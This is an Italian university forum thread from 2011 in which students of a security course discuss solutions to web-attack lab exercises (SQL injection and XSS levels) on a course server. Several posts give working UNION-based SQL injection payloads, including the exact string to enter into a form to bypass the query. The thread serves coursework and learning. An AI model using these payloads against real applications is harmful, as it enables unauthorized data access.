.dsy:it.
Show 150 posts per page

.dsy:it. (http://www.dsy.it/forum/)
- Sicurezza (http://www.dsy.it/forum/forumdisplay.php?forumid=264)
-- Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011 (http://www.dsy.it/forum/showthread.php?threadid=41898)

Posted by gennaro on 13-05-2011 14:15:

Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011

Come per la prima parte, apro questo thread per aiutarci a risolvere insieme gli altri esercizi sugli attacchi web

http://gamebox.laser.dico.unimi.it/sec2/web2/index.html

sono riuscito a fare solo XXS1 e SQLI1 (tutte e 3 i punti)
qualcuno è riuscito a fare qualche altro livello?

Posted by zack1988 on 13-05-2011 16:16:

Risolti i vari problemi sull'SQL Injection, non sono complicati, cercando un pó in rete ho visto che si puó usare l'istruzione UNION di SQL per bypassare la query:

Es: sqli2
SELECT counter, concorrente FROM sqli2 WHERE concorrente='XXX' UNION SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1';

Es: sqli3
SELECT counter, concorrente FROM sqli3 WHERE counter=999 UNION SELECT concorrente, squadra FROM sqli3 WHERE classificato=1;

Es: sqli4
SELECT counter, concorrente FROM sqli4 LIMIT 0, 0 UNION SELECT concorrente, squadra FROM sqli4 WHERE classificato=1

Posted by zack1988 on 13-05-2011 16:20:

Si poteva risolvere in un'altro modo findendo la query:
SELECT counter, concorrente FROM sqli2 WHERE concorrente='XXX';
e di seguito inserire la propria query
SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1';

Ma non so perché da console sql tutto ok, nella form invece continua a darmi un errore sulla sintassi SQL.

Posted by gennaro on 14-05-2011 00:19:

zack quelle query le scrivi nello spazio apposta o nell'url o da qualche altra parte? perchè ho provato ma nn me ne funziona neanche uno di quelli che hai scritto O_o
p.s. a meno che debba usare burp, cosa ke odio e che quindi non uso mai :D

Posted by zack1988 on 14-05-2011 12:46:

No devi scrivere solo una parte :
Es SQLI2
Nella pagina c'è scritto SQL query: SELECT counter, concorrente FROM sqli2 WHERE concorrente=''

e bisogna completarlo inserendo nella form:
XXXXXXX' UNION SELECT concorrente, squadra FROM sqli2 WHERE classificato=1 and '1' = '1

e quando premi invio si nota vedi la query che ho scritto nel post precedente.

Gli altri es sono uguali tranne che non hai una form ma devi inviare una POST.

Spero di essere stato chiaro

Posted by gennaro on 14-05-2011 14:39:

spiegazione impeccabile! grazie mille!

Posted by simoki on 14-05-2011 18:10:

Re: Esercizi Sicurezza - Attacchi Web II PARTE - Lezione 12/5/2011

Originally posted by gennaro
Come per la prima parte, apro questo thread per aiutarci a risolvere insieme gli altri esercizi sugli attacchi web

http://gamebox.laser.dico.unimi.it/sec2/web2/index.html

sono riuscito a fare solo XXS1 e SQLI1 (tutte e 3 i punti)
qualcuno è riuscito a fare qualche altro livello?


Recipes e Marmot Memo (con una delle due varianti) superati.
per gli altri ancora niente..

Posted by gennaro on 16-05-2011 00:20:

non ho ancora dato un'occhiata a tutti questi livelli
si tratta sempre di SQL injection e XXS o come negli altri bisogna guardare codice sorgente, script cookie, etc?

Posted by gennaro on 18-05-2011 16:42:

come hai fatto a fare quei due livelli?? non riesco proprio a riuscirci (in particolare Marmot Memo, sto impazzendo!!! XD)

Posted by MarcoVigna17 on 27-06-2011 12:51:

ma gli ultimi esercizi, con che modalità si risolvono???
All times are GMT. The time now is 19:29.
Show all 10 posts from this thread on one page

Powered by: vBulletin Version 2.3.1
Copyright © Jelsoft Enterprises Limited 2000 - 2002.